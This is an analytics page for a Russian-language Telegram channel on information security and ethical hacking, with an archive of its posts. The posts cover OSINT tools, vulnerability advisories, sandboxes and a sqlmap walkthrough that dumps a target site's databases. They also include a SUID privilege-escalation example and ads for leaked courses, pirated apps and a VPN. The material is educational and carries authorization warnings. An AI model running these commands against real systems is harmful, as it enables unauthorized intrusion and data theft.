uz
Feedback
CodeGuard: CyberSec Edition

CodeGuard: CyberSec Edition

Yopiq kanal

Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Ko'proq ko'rsatish

📈 Telegram kanali CodeGuard: CyberSec Edition analitikasi

CodeGuard: CyberSec Edition kanali faol ishtirokchi. Hozirda hamjamiyat 12 832 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 9 780-o'rinni va Rossiya mintaqasida 51 077-o'rinni egallagan.

📊 Auditoriya ko‘rsatkichlari va dinamika

невідомо sanasidan buyon loyiha tez o‘sib, 12 832 obunachiga ega bo‘ldi.

15 Iyul, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 415 ga, so‘nggi 24 soatda esa 3 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.

  • Tasdiqlash holati: Tasdiqlanmagan
  • Jalb etish (ER): Auditoriya o‘rtacha 12.13% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 6.18% ini tashkil etuvchi reaksiyalarni to‘playdi.
  • Post qamrovi: Har bir post o‘rtacha 1 556 marta ko‘riladi; birinchi sutkada odatda 793 ta ko‘rish yig‘iladi.
  • Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 5 ta reaksiya keladi.
  • Tematik yo‘nalishlar: Kontent codeguard, pysec, docker, grep, контейнер kabi asosiy mavzularga jamlangan.

📝 Tavsif va kontent siyosati

Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Yuqori yangilanish chastotasi (oxirgi ma’lumot 16 Iyul, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.

12 832
Obunachilar
+324 soatlar
+287 kunlar
+41530 kunlar
Postlar arxiv
🧰 5 инструментов для OSINT, которые работают прямо в браузере Не хотите ставить ничего локально? Вот подборка — открыл вклад
🧰 5 инструментов для OSINT, которые работают прямо в браузере Не хотите ставить ничего локально? Вот подборка — открыл вкладку и ищешь. 1. WhatsMyName — проверка юзернейма на 500+ сайтах Ссылка 2. Epieos — поиск по email и номеру телефона (Google, Skype, соцсети) Ссылка 3. IntelX — база утечек, проверка email, доменов, хешей Ссылка 4. DeHashed — поиск по слитым базам (email, логин, телефон) Ссылка 5. ReconFTW — веб-версия популярного OSINT-фреймворка Ссылка 💡 Совет: Используйте через VPN, чтобы не светить свой IP. 😈 CodeGuard: PySec Edition | Чат

🐛 Shai-Hulud: первый червь в npm, который саморазмножался В 2025 году npm пережил самую масштабную атаку в своей истории. По
🐛 Shai-Hulud: первый червь в npm, который саморазмножался В 2025 году npm пережил самую масштабную атаку в своей истории. Появился самореплицирующийся червь, названный в честь песчаного червя из «Дюны» — Shai-Hulud . Он воровал учётные данные разработчиков, внедрял бэкдоры в популярные пакеты и размножался по цепочке зависимостей. Вторая версия червя поразила 700+ пакетов с совокупной еженедельной загрузкой 20 миллионов раз . 🔗 Ссылка на видео (DEF CON / InsomniHack) 8 Что вы узнаете:
🔵Как AiTM-фишинг обходил MFA мейнтейнеров 🔵Почему proof of concept такого червя создали ещё 10 лет назад 🔵Как защитить свои проекты от supply chain-атак
Идеально для разработчиков, DevOps и всех, кто работает с open-source. 😈 CodeGuard: PySec Edition | Чат

🛡 OWASP Juice Shop — тренируй взлом легально Веб-приложение с кучей уязвимостей специально для обучения. SQLi, XSS, CSRF, ин
🛡 OWASP Juice Shop — тренируй взлом легально Веб-приложение с кучей уязвимостей специально для обучения. SQLi, XSS, CSRF, инъекции, брутфорс — всё внутри. 🔗 Сайт: owasp.org/www-project-juice-shop Как начать:
docker pull bkimminich/juice-shop
docker run -d -p 3000:3000 bkimminich/juice-shop
Открыть http://localhost:3000 😈 CodeGuard: PySec Edition | Чат

💉 sqlmap — автоматический поиск SQL-инъекций за 2 минуты Шаг 1. Установка git clone https://github.com/sqlmapproject/sqlmap.
💉 sqlmap — автоматический поиск SQL-инъекций за 2 минуты Шаг 1. Установка
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Шаг 2. Базовое сканирование
python sqlmap.py -u "https://target.com/page?id=1"
Шаг 3. Забираем базы данных
python sqlmap.py -u "https://target.com/page?id=1" --dbs
Шаг 4. Забираем таблицы
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд --tables
Шаг 5. Дамп таблиц
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд -T users --dump
Важно: Только на своих системах или с разрешения. За несанкционированный доступ — уголовная статья. 😈 CodeGuard: PySec Edition | Чат

📚 3 ресурса для изучения Reverse Engineering OpenSecurityTraining.info — бесплатные курсы по x86/x64, ARM, реверс-инжиниринг
📚 3 ресурса для изучения Reverse Engineering OpenSecurityTraining.info — бесплатные курсы по x86/x64, ARM, реверс-инжинирингу и эксплойтам MalwareUniverse — база статей и туториалов по анализу вредоносного ПО на русском Ghidra — альтернатива IDA Pro от АНБ 🎁 Бонус: Плейлист на YouTube «Practical Malware Analysis» от TCM Security. 😈 CodeGuard: PySec Edition | Чат

❌ Рынок труда в России Наткнулся на статистику: на обычную IT-вакансию сейчас претендуют 8 человек. Но как только в требовани
Рынок труда в России Наткнулся на статистику: на обычную IT-вакансию сейчас претендуют 8 человек. Но как только в требованиях появляется владение нейросетями — конкуренция падает до 2,4 к 1. И это касается не только IT, но и маркетинга, дизайна или менеджмента. Сейчас умение работать с ИИ — решающий фактор при найме или пересмотре зарплаты. Чтобы быстрее найти работу и расти в чеке, нужно учиться внедрять технологии в свои задачи уже сейчас. Советую подписаться на экспертов, за которыми слежу сам. В одной подборке — база по внедрению нейронок в реальные проекты, секреты поиска офферов в бигтехе и гайды по запуску своих AI-сервисов с нуля. Подписывайтесь на авторов, которые раскроют ваш потенциал на максимум. IT | AI | ИБ в одном месте 🔽 https://t.me/addlist/9lIOWIFkcaJkYWZi

🐧 Как найти файлы с правами SUID (для повышения привилегий) SUID-файлы позволяют запускать программу от имени владельца. Есл
🐧 Как найти файлы с правами SUID (для повышения привилегий) SUID-файлы позволяют запускать программу от имени владельца. Если владелец — root, вы можете получить root-доступ. Поиск всех SUID-файлов:
find / -perm -4000 2>/dev/null
Проверка на уязвимые известные бинарники: text
find / -perm -4000 2>/dev/null | grep -E "nmap|vim|find|bash|less|more"
Пример эксплуатации (на своих виртуалках):
/usr/bin/find /etc/passwd -exec whoami \;
Если результат root — вы повысили привилегии. Что делать для защиты: Убирать SUID с ненужных файлов через chmod u-s /path/to/file 😈 CodeGuard: PySec Edition | Чат

🔓 CVE-2024-40891 — бэкдор-аккаунты в маршрутизаторах Zyxel В 17 моделях Zyxel нашли скрытые аккаунты с правами root. Их нель
🔓 CVE-2024-40891 — бэкдор-аккаунты в маршрутизаторах Zyxel В 17 моделях Zyxel нашли скрытые аккаунты с правами root. Их нельзя отключить, пароли простые — брутфорс за минуты. CVSS: 7.8 (High)
🔵Что под ударом: Zyxel NAS, DSL-роутеры, точки доступа. Список: NAS326, NAS542, NWA50AX, WAC500 и другие. 🔵Где искать: Проверьте сайт Zyxel, загрузите ваш IP в поисковик по модели. 🔵Что искать: Пользователи zyfwp, Printer, MFT. В логах SSH — подозрильные входы с незнакомых IP.
Как защититься: Обновите прошивку до версии с патчем. Если нет обновления — отключите удалённый доступ к админке. 😈 CodeGuard: PySec Edition | Чат

🕵️‍♂️ Social Analyzer — OSINT по соцсетям, мессенджерам и GitHub Находит профили человека по нику в 300+ сервисах: TikTok, T
🕵️‍♂️ Social Analyzer — OSINT по соцсетям, мессенджерам и GitHub Находит профили человека по нику в 300+ сервисах: TikTok, Telegram, GitHub, Twitter, Discord и даже даркнет-форумах. 🔧 Тулза: Social Analyzer (github.com/qeeqbox/social-analyzer) Установка:
git clone https://github.com/qeeqbox/social-analyzer
cd social-analyzer
npm install
Запуск: npm start → открыть http://localhost:9000 🔥 Кейс: OSINT-специалист искал угрозы в компании. Забил ник тестировщика из чата поддержки — обнаружил, что тот же логин использовался на форуме по продаже базы клиентов. Нарушителя уволили до утечки. 💡 Совет: Запускайте через VPN, чтобы не спалить IP. 😈 CodeGuard: PySec Edition | Чат

🐙 mitmproxy — перехватывай и изменяй HTTP/HTTPS трафик Лучший инструмент для анализа веб-трафика, отладки API и поиска уязви
🐙 mitmproxy — перехватывай и изменяй HTTP/HTTPS трафик Лучший инструмент для анализа веб-трафика, отладки API и поиска уязвимостей. 🔗 GitHub ⭐️ 39k звёзд Что умеет:
🔵Перехват и модификация запросов/ответов на лету 🔵Работа через консоль (mitmproxy) или веб-интерфейс (mitmweb) 🔵Скриптование на Python 🔵Поддержка HTTP/2, WebSocket, gRPC
Быстрый старт:
pip install mitmproxy
mitmweb
Важно: Использовать только на своих устройствах или с разрешения владельца. 😈 CodeGuard: PySec Edition | Чат

🔓 BadRAM — взлом защиты процессоров AMD за $10 Исследователи взломали технологию AMD SEV-SNP (защита виртуальных машин в обл
🔓 BadRAM — взлом защиты процессоров AMD за $10 Исследователи взломали технологию AMD SEV-SNP (защита виртуальных машин в облаках) с помощью Raspberry Pi Pico за $5 и разъёма DDR. 🔗 Статья Суть: 
➡️Злоумышленник обманывает процессор, подсовывая фальшивый чип SPD, который врёт о размере памяти. Это создаёт «двойников» физических адресов и позволяет читать зашифрованную память гостевой VM
  Почему опасно: Атака работает на серверах AMD EPYC (3-е и 4-е поколения) с памятью DDR4/DDR5. Учёные подтвердили, что под ударом AMD SEV-SNP . Что делать: AMD выпустила обновления прошивки. Используйте модули памяти с заблокированным SPD и обновите BIOS 😈 CodeGuard: PySec Edition | Чат

Братан, догадываюсь что ты попробовал уже десяток сервисов обхода😴 ❌Думаешь что идеального сервиса просто нет? Просто ты не
Братан, догадываюсь что ты попробовал уже десяток сервисов обхода😴 Думаешь что идеального сервиса просто нет? Просто ты не знал где искать! А я уже все нашел... BlagoVPN самый стабильный VPN, который только есть в телеграмм: 🔘Обход белых списков 🔘Бесплатный пробный период 🔘Моментальное подключение Попробуй бесплатно уже сейчас и забудешь про другие сервисы👇 https://t.me/blagovpn_sale_bot?start=CODE2

🔍 Вычисляем подозрительные соединения — netstat и ss netstat: netstat -tulpn # слушающие порты netstat -tupan # все соединен
🔍 Вычисляем подозрительные соединения — netstat и ss netstat:
netstat -tulpn   # слушающие порты
netstat -tupan   # все соединения
ss (быстрее):
ss -tulpn        # слушающие порты
ss -t state established  # только активные
🔴 Красные флаги: порты 4444, 1337, 6667, процессы с именами evil.pyreverse. Убить процесс: kill -9 [PID] Сохраняйте. 😈 CodeGuard: PySec Edition | Чат

📘 Computer Security Fundamentals, 3rd Edition — Chuck Easttom Отличный старт для тех, кто хочет войти в ИБ с нуля. Автор — с
📘 Computer Security Fundamentals, 3rd Edition — Chuck Easttom Отличный старт для тех, кто хочет войти в ИБ с нуля. Автор — сертифицированный инструктор с 20+ годами опыта О чём книга: Всё, что нужно знать новичку — от хакерских техник до шифрования и форензики. Почему читать: 
➡️Easttom пишет просто, с реальными примерами. В каждой главе — упражнения и вопросы для самопроверки . Подойдёт студентам, системным администраторам и менеджерам, которые хотят понимать риски.
💠 Качай книгу → [Archive] 😈 CodeGuard: PySec Edition | Чат

📱 t.me/Geek_book_hub - Бесплатная библиотека с книгами - программирование, электроника, айти. 🟢 t.me/club_arduino - Мемы и
📱 t.me/Geek_book_hub - Бесплатная библиотека с книгами - программирование, электроника, айти. 🟢 t.me/club_arduino - Мемы и полезные материалы для ардуинщика, электронщика, DIY'щика. ☄️ t.me/forprinting3D - Если у тебя есть 3д принтер, тогда тебе сюда, тут лучшие модели и идеи для печати. 🚨 t.me/Ali_radio_top - Лучшие предложения, скидки и акции с алиэкспресс. ⁉️ t.me/Pirate_Gram - Бесплатные андроид премиум приложения.

😅 Эпичная битва: я против собственного пароля (пароль победил) История о том, как я убедился, что правильный пароль мешает д
😅 Эпичная битва: я против собственного пароля (пароль победил) История о том, как я убедился, что правильный пароль мешает даже своему владельцу.
🔵Пролог: Пару лет назад решил я сменить пароль от GitHub. Залез в менеджер паролей, сгенерировал рандомную строку на 24 символа: 7$qE#pL2!mX8@zR4&vB6*eC9. Скопировал, вставил, подтвердил. GitHub сказал "спасибо". Чувствовал себя неуязвимым. 🔵Пауза (12 месяцев): За это время я ни разу не вводил пароль руками — SSH-ключи делали всю работу. 🔵Пятница, 23:50: Понадобилось зайти в GitHub с ноутбука друга. Открываю менеджер паролей, а он... требует мастер-пароль. Который я тоже забыл. Потому что менеджером не пользовался последние полгода.
Битва начинается: Раунд 1 — перебор вариантов. Ввожу 7$qE#pL2!mX8@zR4&vB6*eC9 — неверно. Может, регистр другой? Ввожу снова — неверно. Раунд 2 — дикий танец с бубном. Сброс пароля через почту? Но почта требует двухфакторку с телефона, который тоже разрядился. Раунд 3 — смирение. В 2 часа ночи нажимаю "Forgot password". GitHub присылает ссылку на восстановление, и я наконец-то захожу с новым паролем (записал на бумажке). Что я понял:
➡️ Менеджеры паролей бесполезны без главного пароля, который вы помните ➡️ 24 символа — круто, если это пароль от root-сервера, но не от повседневных сервисов ➡️ Стикер с паролем под клавиатурой — не такой уж плохой вариант, если это ваш личный ноутбук ➡️ Бекап мастер-пароля в запечатанном конверте — мастхэв
P.S. Мой новый пароль от GitHub записан на стикере и лежит в кошельке. 😈 CodeGuard: PySec Edition | Чат

🐙 Nuclei — сканер уязвимостей, который используют профессионалы (шаблоны + движок) Устали писать эксплойты для каждой CVE вр
🐙 Nuclei — сканер уязвимостей, который используют профессионалы (шаблоны + движок) Устали писать эксплойты для каждой CVE вручную? Nuclei делает всю работу за вас. 🔗 GitHub (движок) 🔗 GitHub (шаблоны) ⭐️ Звёзд: 23 000+ (движок) + 8 600+ (шаблоны) Что это:
➡️Мощный сканер уязвимостей на YAML-шаблонах. В репозитории с шаблонами собраны тысячи готовых проверок — от CVE до некорректных конфигураций.
Что можно проверять: Веб-приложения (SQLi, XSS, SSRF, XXE) Сетевые сервисы (SSH, FTP, SMB, RDP) DNS, облачные сервисы, API, GraphQL CI/CD системы (Jenkins, GitLab, GitHub) Известные CVE (от 2020 до свежих 2025/2026) 😈 CodeGuard: PySec Edition | Чат

🛠 5 бесплатных сервисов для анализа подозрительных файлов и ссылок Получили подозрительный файл или ссылку? Не открывайте на
🛠 5 бесплатных сервисов для анализа подозрительных файлов и ссылок Получили подозрительный файл или ссылку? Не открывайте на рабочей машине. Вот бесплатные песочницы и анализаторы, которыми пользуются аналитики ИБ. 1. VirusTotal Главный инструмент для начала проверки. Загружаете файл или вставляете URL — и он проверяется 70+ антивирусами. Показывает поведение в песочнице, связи с доменами, комментарии сообщества. 2. ANY.RUN Интерактивная песочница для Windows и Linux. Загружаете файл — открывается виртуальная машина, где вы сами можете «покликать» и посмотреть, что делает программа. Есть бесплатный тариф (с публичным доступом к вашим задачам). 3. Joe Sandbox Очень детальный анализ. Показывает, какие процессы запускает файл, какие ключи реестра меняет, какие сетевые вызовы делает. Бесплатная версия даёт доступ к публичным отчётам. 😈 CodeGuard: PySec Edition | Чат

⚠️ Внимание: Опубликована слитая недавно База из 1000+ топовых курсов и материалов для айтишников Отсортировали их для вашего удобства и выложили в телеграм-каналы по категориям: 🤖 Нейросети – 855+ материалов 🖥 Python — 1558+ материалов 👩‍💻 Frontend — 1241+ материалов 👩‍💻 Backend — 1095+ материалов ⚙️ Программы — 978+ материалов 📚 Книги по IT — 779+ материалов ⌛️ Ссылки будут активны 48 часов, сохрани себе, чтобы не потерять!

🛠 5 бесплатных сервисов для анализа подозрительных файлов и ссылок Получили подозрительный файл или ссылку? Не открывайте на
🛠 5 бесплатных сервисов для анализа подозрительных файлов и ссылок Получили подозрительный файл или ссылку? Не открывайте на рабочей машине. Вот бесплатные песочницы и анализаторы, которыми пользуются аналитики ИБ. 1. VirusTotal Главный инструмент для начала проверки. Загружаете файл или вставляете URL — и он проверяется 70+ антивирусами. Показывает поведение в песочнице, связи с доменами, комментарии сообщества. 2. ANY.RUN Интерактивная песочница для Windows и Linux. Загружаете файл — открывается виртуальная машина, где вы сами можете «покликать» и посмотреть, что делает программа. Есть бесплатный тариф (с публичным доступом к вашим задачам). 3. Joe Sandbox Очень детальный анализ. Показывает, какие процессы запускает файл, какие ключи реестра меняет, какие сетевые вызовы делает. Бесплатная версия даёт доступ к публичным отчётам. 😈 CodeGuard: PySec Edition | Чат